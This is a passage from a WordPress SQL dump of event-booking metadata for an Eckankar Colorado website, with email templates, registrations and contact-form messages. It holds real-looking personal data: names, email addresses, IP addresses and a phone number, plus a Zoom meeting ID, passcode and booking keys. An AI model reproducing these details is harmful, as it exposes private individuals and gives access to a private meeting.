cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(173119,267539,'mec_event_status','EventScheduled'),(173120,267539,'mec_moved_online_link',''),(173121,267539,'mec_cancelled_reason',''),(173122,267539,'mec_display_cancellation_reason_in_single_page',''),(173123,267539,'protect_children',''),(173124,267539,'passster_activate_global_protection',NULL),(173125,267539,'passster_activate_protection',NULL),(173126,267539,'passster_protection_type','password'),(173127,267539,'boldgrid_hide_page_title','0'),(173128,267539,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(173129,267539,'boldgrid_in_page_containers','1'),(173131,267539,'_dp_original','266543'),(173132,267539,'_edit_lock','1671042991:2'),(173133,267539,'_edit_last','2'),(173138,267550,'mec_cancellation_key','3a7e73e14ccf1387817ac304254cb619'),(173139,267550,'mec_confirmed','1'),(173140,267550,'mec_event_id','266604'),(173141,267550,'mec_date','1671363900:1671368400'),(173142,267550,'mec_ticket_id',',1,'),(173143,267550,'mec_booking_time','2022-11-28 05:17:51'),(173144,267550,'mec_all_dates','a:0:{}'),(173145,267550,'mec_other_dates','a:0:{}'),(173146,267550,'mec_attention_time','1671363900:1671368400'),(173147,267550,'mec_attention_time_start','1671363900'),(173148,267550,'mec_attention_time_end','1671368400'),(173149,267550,'mec_book_date_submit','20221128051751'),(173150,267550,'mec_booking_location','118'),(173151,267550,'mec_ticket_price_1','0'),(173152,267550,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"assika@guyerne.com\";s:4:\"name\";s:8:\"Guy-Erne\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"37.228.207.160\";}}'),(173153,267550,'mec_price','0'),(173154,267550,'mec_gateway','MEC_gateway_free'),(173155,267550,'mec_gateway_label','Free'),(173156,267551,'_field_133','Carol'),(173157,267551,'_field_134','Chocklett'),(173158,267551,'_field_135','carolkc88@gmail.com'),(173159,267551,'_field_137','HI Retreat'),(173160,267551,'_field_138','Hi, if possible, please email me information on the April 4-7, 2023, HI retreat, including hotel information, etc.\nMy email is carolkc88@gmail.com and phone is 512-809-9516.  I live in Austin, TX\nThank you.\nCarol Chocklett'),(173161,267551,'_form_id','13'),(173162,267551,'_seq_num','123'),(173163,267539,'_thumbnail_id','265440'),(173196,267554,'mec_start_day_seconds','37800'),(173197,267554,'mec_end_date','2022-12-11'),(173198,267554,'mec_end_time_hour','11'),(173199,267554,'mec_end_time_minutes','30'),(173200,267554,'mec_end_time_ampm','AM'),(173201,267554,'mec_end_day_seconds','41400'),(173202,267554,'mec_repeat_status','0'),(173203,267554,'mec_repeat_type',''),(173204,267554,'mec_repeat_interval','1'),(173205,267554,'mec_repeat_end',''),(173206,267554,'mec_repeat_end_at_occurrences',''),(173207,267554,'mec_repeat_end_at_date',''),(173208,267554,'mec_advanced_days','a:0:{}'),(173209,267554,'mec_in_days',''),(173210,267554,'mec_not_in_days',''),(173211,267554,'mec_hourly_schedules','a:0:{}'),(173212,267554,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(173213,267554,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(173214,267554,'mec_fees_global_inheritance','1'),(173215,267554,'mec_fees','a:0:{}'),(173216,267554,'mec_ticket_variations_global_inheritance','1'),(173217,267554,'mec_ticket_variations','a:0:{}'),(173218,267554,'mec_reg_fields_global_inheritance','1'),(173219,267554,'mec_reg_fields','a:0:{}'),(173220,267554,'mec_bfixed_fields','a:0:{}'),(173221,267554,'mec_op','a:0:{}'),(173222,267554,'mec_fields','a:0:{}'),(173223,267554,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}}'),(173224,267554,'mec_event_status','EventScheduled'),(173225,267554,'mec_moved_online_link',''),(173226,267554,'mec_cancelled_reason',''),(173227,267554,'mec_display_cancellation_reason_in_single_page',''),(173228,267554,'protect_children',''),(173229,267554,'passster_activate_global_protection',NULL),(173230,267554,'passster_activate_protection',NULL),(173231,267554,'passster_protection_type','password'),(173232,267554,'boldgrid_hide_page_title','0'),(173233,267554,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(173234,267554,'boldgrid_in_page_containers','1'),(173238,267554,'_dp_original','266540'),(173236,267554,'_thumbnail_id','266734'),(173237,267554,'_wp_old_date','2022-04-30'),(173239,267554,'_edit_lock','1670084314:15'),(173240,267554,'_edit_last','15'),(174307,267609,'mec_currency','a:0:{}'),(174306,267609,'mec_cost',''),(174305,267609,'mec_more_info_target','_self'),(174304,267609,'mec_more_info_title',''),(174302,267609,'mec_read_more',''),(174303,267609,'mec_more_info',''),(174301,267609,'mec_organizer_id','1'),(174299,267609,'mec_location_id','122'),(174300,267609,'mec_dont_show_map','0'),(174310,267609,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-01-22\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-01-22\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(174309,267609,'mec_additional_location_ids','a:0:{}'),(174308,267609,'mec_additional_organizer_ids','a:0:{}'),(174298,267609,'mec_color',''),(173271,267559,'_field_97','pat'),(173272,267559,'_field_98','winter'),(173273,267559,'_field_99','pwinter11@gmail.com'),(173274,267559,'_field_100','(303) 324-5805'),(173275,267559,'_field_101','Other'),(173276,267559,'_field_104','RESA'),(173277,267559,'_field_105','Hi Melony, I didn\'t have your email, so using this way of thanking you for your very sweet and thoughtful message and card.  I am still getting used to my new area (currently living with my daughter in NJ) while anticipating a move to CT by next summer, although the CT address is my official residence and I pick up my mail there.\nHopefully I\'ll be able to attend both CO events and they\'re on my calendar.\nwith love in ECK - Pat\nps - I love the lavender and the art work on the card, you are an excellent artiste!\n'),(173278,267559,'_form_id','10'),(173279,267559,'_seq_num','24'),(173280,267560,'mec_transaction_id','CAP72345'),(173281,267560,'mec_user_id','1000023'),(173282,267560,'mec_verified','1'),(173283,267560,'mec_verification_key','fb7dd1686e6e638f24d7242acbb75bc6'),(173284,267560,'mec_cancellation_key','6cde703001f4394dadc0f4aed9fda823'),(173285,267560,'mec_confirmed','1'),(173286,267560,'mec_event_id','267554'),(173287,267560,'mec_date','1670754600:1670758200'),(173288,267560,'mec_ticket_id',',1,'),(173289,267560,'mec_booking_time','2022-12-10 20:02:50'),(173290,267560,'mec_all_dates','a:0:{}'),(173291,267560,'mec_other_dates','a:0:{}'),(173292,267560,'mec_attention_time','1670754600:1670758200'),(173293,267560,'mec_attention_time_start','1670754600'),(173294,267560,'mec_attention_time_end','1670758200'),(173295,267560,'mec_book_date_submit','20221210200250'),(173296,267560,'mec_booking_location','129'),(173297,267560,'mec_ticket_price_1','0'),(173298,267560,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"184.55.32.29\";}}'),(173299,267560,'mec_price','0'),(173300,267560,'mec_gateway','MEC_gateway_free'),(173301,267560,'mec_gateway_label','Free'),(173302,267561,'mec_transaction_id','TMC76720'),(173303,267561,'mec_user_id','1000056'),(173304,267561,'mec_verified','1'),(173305,267561,'mec_verification_key','1ecfb79ea64fe4d1997bf8b553915b40'),(173306,267561,'mec_cancellation_key','502c23931a04d3ee17e5340ddd6f451e'),(173307,267561,'mec_confirmed','1'),(173308,267561,'mec_event_id','267554'),(173309,267561,'mec_date','1670754600:1670758200'),(173310,267561,'mec_ticket_id',',1,'),(173311,267561,'mec_booking_time','2022-12-11 07:38:07'),(173312,267561,'mec_all_dates','a:0:{}'),(173313,267561,'mec_other_dates','a:0:{}'),(173314,267561,'mec_attention_time','1670754600:1670758200'),(173315,267561,'mec_attention_time_start','1670754600'),(173316,267561,'mec_attention_time_end','1670758200'),(173317,267561,'mec_book_date_submit','20221211073807'),(173318,267561,'mec_booking_location','129'),(173319,267561,'mec_ticket_price_1','0'),(173320,267561,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"huuu4luv@xplornet.com\";s:4:\"name\";s:16:\"Marlene Chapelle\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"208.114.129.33\";}}'),(173321,267561,'mec_price','0'),(173322,267561,'mec_gateway','MEC_gateway_free'),(173323,267561,'mec_gateway_label','Free'),(173324,267562,'mec_transaction_id','LOW74542'),(173325,267562,'mec_user_id','1000022'),(173326,267562,'mec_verified','1'),(173327,267562,'mec_verification_key','6e4f10b5d67aa2f81e2c8732c020de7e'),(173328,267562,'mec_cancellation_key','b1905e442728f9b4dfe0f8deed18a8d6'),(173329,267562,'mec_confirmed','1'),(173330,267562,'mec_event_id','267554'),(173331,267562,'mec_date','1670754600:1670758200'),(173332,267562,'mec_ticket_id',',1,'),(173333,267562,'mec_booking_time','2022-12-11 10:14:16'),(173334,267562,'mec_all_dates','a:0:{}'),(173335,267562,'mec_other_dates','a:0:{}'),(173336,267562,'mec_attention_time','1670754600:1670758200'),(173337,267562,'mec_attention_time_start','1670754600'),(173338,267562,'mec_attention_time_end','1670758200'),(173339,267562,'mec_book_date_submit','20221211101416'),(173340,267562,'mec_booking_location','129'),(173341,267562,'mec_ticket_price_1','0'),(173342,267562,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"24.2.64.240\";}}'),(173343,267562,'mec_price','0'),(173344,267562,'mec_gateway','MEC_gateway_free'),(173345,267562,'mec_gateway_label','Free'),(173346,267563,'mec_transaction_id','DZP26574'),(173347,267563,'mec_user_id','1000022'),(173348,267563,'mec_verified','1'),(173349,267563,'mec_verification_key','8e2400db79b3e3b92079be35b7b3bbd9'),(173350,267563,'mec_cancellation_key','5c58ebf06ee4621d4f4c56994160c534'),(173351,267563,'mec_confirmed','1'),(173352,267563,'mec_event_id','267554'),(173353,267563,'mec_date','1670754600:1670758200'),(173354,267563,'mec_ticket_id',',1,'),(173355,267563,'mec_booking_time','2022-12-11 10:27:08'),(173356,267563,'mec_all_dates','a:0:{}'),(173357,267563,'mec_other_dates','a:0:{}'),(173358,267563,'mec_attention_time','1670754600:1670758200'),(173359,267563,'mec_attention_time_start','1670754600'),(173360,267563,'mec_attention_time_end','1670758200'),(173361,267563,'mec_book_date_submit','20221211102708'),(173362,267563,'mec_booking_location','129'),(173363,267563,'mec_ticket_price_1','0'),(173364,267563,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"24.2.64.240\";}}'),(173365,267563,'mec_price','0'),(173366,267563,'mec_gateway','MEC_gateway_free'),(173367,267563,'mec_gateway_label','Free'),(173368,267564,'mec_transaction_id','KWF87636'),(173369,267564,'mec_user_id','1000050'),(173370,267564,'mec_verified','1'),(173371,267564,'mec_verification_key','9f94d265d9e9897630b681b50cf5cdc6'),(173372,267564,'mec_cancellation_key','b1ffcc2009c6184aa6ba6ed6d4375042'),(173373,267564,'mec_confirmed','1'),(173374,267564,'mec_event_id','267539'),(173375,267564,'mec_date','1671359400:1671363000'),(173376,267564,'mec_ticket_id',',1,'),(173377,267564,'mec_booking_time','2022-12-12 14:23:03'),(173378,267564,'mec_all_dates','a:0:{}'),(173379,267564,'mec_other_dates','a:0:{}'),(173380,267564,'mec_attention_time','1671359400:1671363000'),(173381,267564,'mec_attention_time_start','1671359400'),(173382,267564,'mec_attention_time_end','1671363000'),(173383,267564,'mec_book_date_submit','20221212142303'),(173384,267564,'mec_booking_location','118'),(173385,267564,'mec_ticket_price_1','0'),(173386,267564,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana 